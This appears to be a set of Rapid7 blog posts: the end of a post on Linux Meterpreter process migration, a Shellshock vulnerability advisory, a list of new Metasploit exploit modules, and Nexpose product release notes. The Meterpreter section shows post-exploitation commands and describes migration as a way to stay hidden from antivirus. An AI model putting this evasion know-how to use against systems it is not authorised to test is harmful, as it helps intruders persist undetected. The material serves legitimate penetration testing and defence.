easy way to use the feature is jut to provide the target PID: meterpreter > migrate 18084 [*] Migrating to 18084 [*] Migration completed successfully. meterpreter > getpid Current pid: 18084 meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 meterpreter > Requirement #2: Reuse the original socket As a second requirement, in order to imitate the windows behavior the meterpreter session socket will be reused. On Windows a socket can be duplicate on a remote process with WSADuplicateSocket. But such API doesn't exist on Linux as far as I know, you cannot dup() a socket on a process which isn't a child. Luckily UNIX domain sockets can be used with one caveat, they will use filesystem (which breaks the first requirement). The most important reason for "in-memory" migration is to remain stealthy, avoiding security products such as antivirus monitoring filesystem. Hopefully, antivirus won't catch an UNIX Domain socket used just to share a socket as malicious, what makes us think it is not so bad! By default the UNIX domain socket will be written to "/tmp", but you can specify an alternate directory with an optional second argument which the command accepts: meterpreter > migrate -h Usage: migrate <pid> [writable_path] Migrates the server instance to another process. NOTE: Any open channels or other dynamic state will be lost. meterpreter > migrate 2075 /home/juan/.pulse [*] Migrating to 2075 [*] Migration completed successfully. meterpreter > getpid Current pid: 2075 And that's all for this HaXmas and introduction to linux meterpreter migration! As always, remember which the meterpreter code is also open source if you're interested on the details! And there is a lot of work to do with the Linux meterpreter, improving its reliability and features. It's a really interesting code to work with, with lot of awaiting joys . So, if you interested in collaborate with Metasploit it is definitely a good option to look at! Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Bash-ing Into Your Network & Investigating CVE-2014-6271

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278).  In sum:…

[UPDATE September 29, 2014: Since our last update on this blog post, four new CVEs that track ShellShock/bash bug-related issues have been announced. A new patch was released on Saturday September 27 that addressed the more critical CVEs (CVE-2014-6277 and CVE-2014-6278).  In sum: If you applied the ShellShock-related patches before Saturday September 27, you likely need to apply this new patch. We have updated our original blog post below to reflect this new information.]Original blog post with September 29 updates below: By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal.  It's rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released September 25, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fixes are being tracked as CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.Should I panic?The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process.What is vulnerable?This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash.Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise).There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. (There are Metasploit modules available validating this exploit path.)Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue.In summary, there just isn't enough information available to predict how many systems are potentially exploitable today.The two most likely situations where this vulnerability will be exploited in the wild:Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shellPHP applications running in CGI mode that call out to system() and where Bash is the default shellBottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to remotely exploit it are fairly uncommon for remote exploitation. Update (September 25): A DDoS bot that exploits this issue has already been found in the wild by @yinettesys.Update (September 29):  There have been several reports of CVE-2014-6271 being exploited through worms.There is Proof of Concept code to exploit DHCP found by Geoff Walton.There have been memory corruption flaw in the Bash parser found by @taviso being tracked as CVE-2014-7186 and CVE-2014-7187.  We don't expect to see exploit code immediately and it wouldn't be applicable without specific targeting.A couple new issues were found by Michal Zalewski (@lcamtuf) the first, CVE-2014-6277, permits remote code execution and requires a high level of expertise.  The second, CVE-2014-6278, is more severe as it allows remote code execution and doesn't require a high level of expertise.  These two vulnerabilities have been resolved in upstream patches Ubuntu/RHEL/Debian that include Florian Weimer's unofficial patch.Is it as bad as Heartbleed?There has been a great deal of debate on this in the community, and we're not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks.BUT – and that's a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread.What can we do to help?[Updated October 1]Rapid7 Metasploit has been updated to assist with the detection and verification of these issues. Modules for testing various exploitation paths are available in both Metasploit Community and Pro. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. Rapid7 Nexpose has been updated with authenticated and remote checks for CVE-2014-6271 and CVE-2014-7169. Nexpose 5.10.12 improves the accuracy for the remote Shellshock (CVE-2014-6271) vulnerability check customers should update their Nexpose deployments to Nexpose 5.10.12.  Nexpose 5.10.13 added authenticated coverage has been added for CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278.If you would like some advice on how to handle this situation, our Services team can help.Are Rapid7's solutions affected?[Updated September 29]Nexpose Virtual Appliances are provided with the Ubuntu distribution operating system, which has patches for both CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187. We've just updated the Nexpose Virtual Appliance Deployment Guide with the instructions to update the underlying Ubuntu OS. We recommend that you review the guide and apply the latest system patches that were released on September 27th.More informationWe've gathered all information we've published about BashBug right here: bashbug CVE-2014-6271 (shellshock): What is it? How to Remediate | Rapid7

msfconsole failing to start? Try 'msfconsole -n'

As part of the last release, the Metasploit Engineering team here at Rapid7 has been on a path of refactoring in the Metasploit open source code in order to make it more performant and to get toward a larger goal of eventually breaking up the…

As part of the last release, the Metasploit Engineering team here at Rapid7 has been on a path of refactoring in the Metasploit open source code in order to make it more performant and to get toward a larger goal of eventually breaking up the framework into a multitude of libraries that can be used and tested in a standalone way.This effort will make it easier to deliver features and respond to issues more quickly, as well as ensure that regressions and bugs can get diagnosed, triaged, and fixed up more effectively.Over the next year or so, we will be making drastic improvements in the loading, speed, and content reasoning capabilities of the framework, driving huge improvements to the features that our community members love and use every day.Of course, we have several years worth of often uncharted territory in the code to convert, and this process of modernizing the way Metasploit does things ended up causing a mysterious and frustrating bug for new and occasional users of the Metasploit Framework.Specifically, if you tried to start 'msfconsole,' which is the terminal-based UI for Metasploit, and you didn't already have a database configured to store the fruits of your exploitation adventures, the console would crash out.We landed a fix to this crashy behavior yesterday in Pull Request #3666, which was reported as bug #8840 on late Friday afternoon, and this fix should hit the Kali distributions any time now.Now, this bug doesn't manifest in the usual Metasploit installed environment -- after all, most penetration testers like to keep a record of what they did -- and anyone who has followed the Kali documentation on configuring a database, as well as any Metasploit contributor who has followed the MSF-DEV documentation on database config, wouldn't have noticed this problem.At any rate, if bug #8840 is still affecting you, right now, you can work around the bad behavior simply by starting Metasploit with 'msfconsole -n', which is the explicit way to start without database backing. In the mean time, Rapid7 should have a fix out that restores the normal, non-explicit behavior with the impending weekly release.tl;dr: Please pardon our dust while we remodel Casa de Metasploit.

Rapid7 Free Tools - Download Today!

Hello all,It's your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you; Rapid7's suite of Free Security Tools.If you're a one man shop, trying to make sure you're as buttoned…

Hello all,It's your friendly neighborhood Community Manager again, this time reaching out to talk about something that should be of interest to all of you; Rapid7's suite of Free Security Tools.If you're a one man shop, trying to make sure you're as buttoned up as possible, or a giant organization just looking to do some validation and double checking, I'm sure one or more of these tools would be an excellent addition to your existing security portfolio.Here's a list of our own Portfolio.  Click on the links to get some additional information, and to download the licenses.Nexpose Community Edition: Our original tool -  Nexpose is a vulnerability scanning software that is the best in the business.  Don't take my word for it though. To see how excellent it is, download the community edition, and test it out for yourself, on your own networks. We're pretty sure that if you're looking for an enterprise tool, the taste-test available with the community edition will be more than enough to prove it's value.Metasploit Community Edition: Metasploit, our penetration testing tool, is the perfect piece of software for both pen testing your networks, and validating the findings of your latest vulnerability scan. Also, if you're looking to teach yourself how to be a pen tester, the only way to learn, really is to do. Download our community edition, start your testing, and interact with other pen testers here on SecurityStreet to learn more.Mobilisafe 14-day Trial: Are you looking to better understand the risks that you're facing with BYOD? Want to mitigate the risks associated with employees who keep forgetting to update or patch their own devices? Try out our free Mobilisafe 14 day trial, and learn how easy it is to keep the risk of the mobile devices on your network low.RiskRater: Our newest free tool, RiskRater is a survey that will measure your mobile, endpoint, and user based risk, in comparison to industry benchmarks. We asked, and over 600 organizations answered our 18 question survey, to help us set up the benchmarks. You can use this tool to see how your own security stance and configurations compares. Also, each question you answer provides you with real and actionable follow up tasks that can help address the risk that you helped expose in your survey. We're not going to save or share your information, and there's nothing to download - just click to launch the tool, and get a good spot check on your real risk.Metasploitable: If you're new to Penetration Testing, and you're just starting to learn Metasploit, you don't want to test something out on your production network. Having to explain to your boss why critical system # 1 is down is not an ideal conversation to have. To address this, the Metasploit team developed Metasploitable. This is a safe, and intentionally vulnerable virtual machine that you can run pen tests against to make sure you understand how to best use the exploits at your disposal. The Metasploit team calls it a, "pen test in a box," so if you'd like to try it out, please download our VMware virtual machine here and get started.ScanNow - MySQL: The MySQL Vulnerability CVE-2012-2122, best described in HD Moore post here, is quite a risk, allowing every 256th login regardless of password. If you'd like to quicky and easily check to see if your MySQL servers are vulnerable, just click and download and run the test yourself.ScanNow - UPnP: This free ScanNow scanner checks your network enabled devices to see if they are vulnerable to an attack via UPnP. This blog and whitepaper from Rapid7 and HD Moore estimates upwards of 50 Million network devices are at risk because of vulnerabilities found in this protocol. Click and download this free tool, to see if you're one of the millions of people affected by this, and what you can do to make sure you close this potential damaging security flaw.UPnP Router Check: Want a quick router scan to check on the status of UPnP enabled devices?  Click here and run a scan quickly and easily. This will only check your router exposure, so make sure to download the free ScanNow UPnP tool listed above to check your internal status.And finally, BrowserScan: This free tool enables your organazation to check on the browsers currently in use, and allows you to identify the risk of out of date items, unpatched plug-ins, and can even restrict access to sensitive information until a fix or upgrade is secured. It's as simple as embedding a tracking code on your internal site, to look up all the browsers in use, and can even return analytics to show you how you're addressing your risk over time.I also recommend that you check out Kali Linux - by Offensive Security, the same team that brought you Backtrack. Kali Linux, the upgraded Backtrack, is a debian derived Linux distrubition that was designed for both pen testing and digital forensics. Kali is full of open source tools that you can use to test your own networks including nmap, Wireshark, John the Ripper, and Aircrack-ng. Due to a partnership between Offensive Security and Rapid7, a specially designed license of Metasploit is available as an internal component to the download. Visit Offensive Security to learn more.All of these tools, as I mentioned, are 100% free to download and use. Most of them are so user-friendly, it can take as little as 10 seconds in some cases to find at your level of risk regarding a specific vulnerability. My own philosophy on using these tools? If anything can make it harder for an attacker to gain access, then it's worth taking a shot, and if it's free, it's worth a small amount of your time, isn't it?Now I know that's a lot to take in and review, so if you've got any questions about these products - or if you're currently using them, and you'd be willing to share some of your best practices or tips on how they've worked sucessfully in your own environments, please let us know! You can drop us a line here, and include some info on what you're working on, and we would love to discuss any findings or feedback you have.Finally, if you've got a great idea for another free tool that we could develop, please let us know. Who knows? If we do design it, maybe we'll name it after you?Thanks all, and feel free to drop me a line here if you'd like to discuss offline Patrick Hellen

Weekly Update: Metasploit Pro on Chromebook, Galaxy Tab, and a Batch of New ZDI Exploits

Vegas Time!Like the rest of the information security industry, we're buttoning down for the annual pilgramage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our…

Vegas Time!Like the rest of the information security industry, we're buttoning down for the annual pilgramage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our phones to avoid casual ownage, and test driving our new Chromebook builds of Metasploit Pro. They're pretty sweet. The latest update for ARM-arch Kali should run without a problem on a SD Card-installed Chromebook alternate OS, as seen here:This just in: Metasploit Pro is known to successfully pop shells from a Galaxy Tab, as well -- this photo courtesy of Mati "muts" Aharoni of Offensive Security:While the technical work is impressive by itself, the decals that Lance @lsanchez-r7 Sanchez cooked up pretty much steal the show:Yeah, we're pretty pleased with these. (:As far as confirmed meatspace appearances from the Rapid7 Metasploit contingent, nex and rep are presenting at  BlackHat about Cuckoo Sandbox,  todb will be speaking at BSidesLV Common Ground with Thomas d'Otreppe about the vices and virtues of open source security, and of course Egypt will be delivering in-depth Metasploit training at BlackHat.So, be careful out there, stay safe (infosec-wise, if not health-wise), swing by our BlackHat Booth #517 for some awesome Metasploit 10-year anniversary T-shirts, and let's see what we can do to advance the state of the art of open source security for another year or ten.New ModulesWe've got seven new modules with this week's update. As you can see below, this week is pretty heavy on the ZDI-reversed exploits. We've got ZDI-13-352 for HP products, a couple vectors for ZDI-13-110 for Apple Quicktime, and ZDI-13-147 for VMWare.Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147AvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Nexpose 5.6 - CIS RHEL Certified!

Nexpose 5.6, released last week, builds on our USGCB, FDCC, and CIS Windows certifications by adding CIS certified assessment of Red Hat Enterprise Linux systems. Nexpose 5.6 includes the CIS "Level I" and "Level II" policies for RHEL 4, 5, & 6. …

Nexpose 5.6, released last week, builds on our USGCB, FDCC, and CIS Windows certifications by adding CIS certified assessment of Red Hat Enterprise Linux systems. Nexpose 5.6 includes the CIS "Level I" and "Level II" policies for RHEL 4, 5, & 6.  This means you can now use Rapid7's integrated vulnerability and configuration management solution to assess the configuration of your RHEL desktops and servers.The CIS RHEL policies are included by default in the CIS scan template (as shown below). RHEL 5 & 6 have two polices, "Level One" and "Level Two". The distinction is that a "Level One" policy is intended to be practical without negatively impacting usability, whereas "Level Two" is designed to provide a "defence-in-depth" resilience but may impact the usability of the server. The correct one to evaluate your systems against will depend on the host being assessed, but there is no harm in running both against a host to see how you measure up.The screenshot below was captured from the device view of an asset scanned with all the RHEL policies. In this case, the host is RHEL 4, so the 5 & 6 policies report as Not Applicable (N/A). The RHEL 4 host is apparently reasonably well configured, as it is 98.59% in compliance with the CIS RHEL 4 benchmark.Drilling down into the detailed policy results view (below) for that target we can see that the vast majority of rules were compliant. The rules in these benchmarks cover a broad range of system configuration items, including required and prohibited packages, services which must be disabled on enabled, file permissions on specific executables, and application specific configuration items.And if we drill down into a rule (again, below) you can see the outcome with a detailed proof. In this case, the rule requires that Network Information Service(NIS) server is disabled, and we have concluded that the host is compliant because neither the ypserv or yppasswdd packages are installed.For more information on Nexpose 5.6, you can look at the release notes.

Simplify Vulnerability Management with Nexpose 5.6

We are pleased to announce the next major release of Nexpose, version 5.6.  This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.New Look and FeelThe most visible…

We are pleased to announce the next major release of Nexpose, version 5.6.  This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.New Look and FeelThe most visible change in Nexpose 5.6 is the new look and feel of the user interface.  The action header is now smaller to maximize screen space and usability, and the new colour scheme makes it easier to focus on important areas of the application.Simplifying Remediation PrioritizationSecurity Teams are often inundated with thousands of vulnerabilities across all their assets through their entire network. One of the major challenges facing Security teams is the difficulty in translating known vulnerabilities (the "What") discovered on their network into remediation steps (the "How"). With all of vulnerabilities on the network, security teams struggle with determining which vulnerabilities on their network are the most important to fix and what they need to do to remediate. There are many different ways that this can be tackled. Organizations can go from the top down the vulnerability list based on security risk using a metric like CVSS, focus on their business critical systems first, or throw darts at a wall. In all cases, security teams are focusing on fixing each vulnerability individually on the list of assets they care about. When you are getting into the thousands of vulnerabilities, with more coming every day, it becomes almost impossible for security teams to act as they spend all their time worrying about fires and the next big thing.The other main problem facing security teams is that they often are not the teams performing the actual remediation. Usually they work with the IT Team to apply a patch, upgrade a new version of the vulnerable software on the affected asset, or perform another mitigation technique. The problem is that security and IT teams often speak a different language that is often incompatible with each other. As an example, the security administrator managing the vulnerability management program in an organization might notice that there is a serious vulnerability on a specific asset. After determining whether or not the vulnerability was valid (it was!) and determining which IT administrator was responsible for that asset, the security administrator is now responsible for telling the IT admin to patch that host. Simple enough. The security admin will just tell IT guy, or create a ticket, to state that they need to patch the critical vulnerability CVE-2013-1234 on the asset. They'll probably include the fact that it has a CVSS score of 10.0 and that it's highly critical. All important things to the security admin, but completely useless information to the IT admin. The IT guy is now forced to figure out what all the security mumbo-jumbo means and translate it into something they can understand.Making it easy for IT Teams to take action on vulnerabilities is only the first step. With thousands of vulnerabilities to manage, going through them one by one does not scale, and providing a thousand page report with all the information within it makes matters worse..  For every vulnerability on your network that you solve, even more come in on a day to day basis. It is imperative that security teams have a system that allows them to prioritize fixing the right risks that affect their organization.Not all of the thousands of vulnerabilities that affect a specific organization have different remediation steps. With vulnerability supersedence and product updates, often times multiple vulnerabilities can be fixed by performing one step. If an asset has twenty vulnerabilities on it when scanned with Nexpose, but all of them are associated with Adobe Flash, then the solution for all twenty vulnerabilities would be to upgrade the version of Adobe Flash on that host. It is a simple solution that solves the problem for the security admin, presents the information in a way that the IT admin understands ("Patch Flash on Host") and moves teams away from thinking about vulnerabilities being the default metric in how you look at data.It is a powerful way of thinking about managing your vulnerability program. Instead of focusing on vulnerabilities one-by-one, you can ask the question, "What is the one thing I can do that will minimize my security risk the most and how much will it lower it by?"Nexpose 5.6 includes two new reports that assist you in making your life easier. The first report is a high-level summary that allows you to see, in a prioritized view, the top 'n' remediation actions that will reduce your level of risk. The report will also provide guidance on how your overall security profile for your organization will improve by applying these remediation steps. These include, as percentages, the following metrics.Overall Vulnerability Risk (% Reduced)Number of Assets RemediatedNumber of Vulnerabilities with Known Exploits Remediated (% Reduced)Number of Vulnerabilities associated with Known Malware Kits Remediated (% Reduced)Like any other report in Nexpose, you can restrict the data in the report to specific Sites, Asset Groups, or vulnerability categories for further configurability and granularity. For example, if you have a Dynamic Asset Group that is configured to only include Windows Assets, you can create a remediation report that only list the prioritized remediations for the Windows assets in your environment. This allows you to tailor actionable reports to different IT groups within your organization in a language they understand.Configuration Compliance EnhancementsNexpose 5.6 also adds new content within the Policy Manager around configuration assessment  The latest version of Nexpose includes new certified Center for Internet Security (CIS) Benchmarks for the Red Hat Enterprise Linux 4, 5, and 6 operating systems.We are extending the ability, introduced with the release of Windows CIS Policy content in Nexpose 5.5, for organizations to determine their overall level of compliance to common best practices developed by CIS. This is a big deal for organizations who need to measure their level of compliance against known best standards on Red Hat Enterprise Linux hosts.Determining the overall level of compliance can be a difficult problem to solve for a lot of organizations. They either have to perform the assessment by hand across all of their assets, or use multiple toolsets to pull out this data. Nexpose is flexible to the needs of organizations by allowing users to scan for both Vulnerabilities and Configuration Issues within a unified assessment toolset, allowing users to minimize the amount of scan configuration and time required to get both vulnerability, application and configuration result data in a low touch manner. Users can select any selection of Policies, either old or new, into any scan template.In addition, if your organization has decided that the included CIS Red Hat Enterprise Linux benchmarks within the product are great baseline but do not necessarily meet the needs of you organization, you can use our Policy Editor to make modifications to copies of the included policies within Nexpose. You can then include these custom policies in any scan template for inclusion within a scan.These features are designed to simplify the overall experience for our customers. We want you to make informed and intelligent decisions on what you should do next, freeing up time for you to act, rather than trying to spend time trying to mine through vulnerability and compliance data or dealing with IT. We know that focusing on a remediation view allows you to build a rapport with the IT teams, maximize risk savings while minimizing work effort, and overall simplify and strengthen the security posture of your organization.For more information on Nexpose 5.6, you can look at the release notes here.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now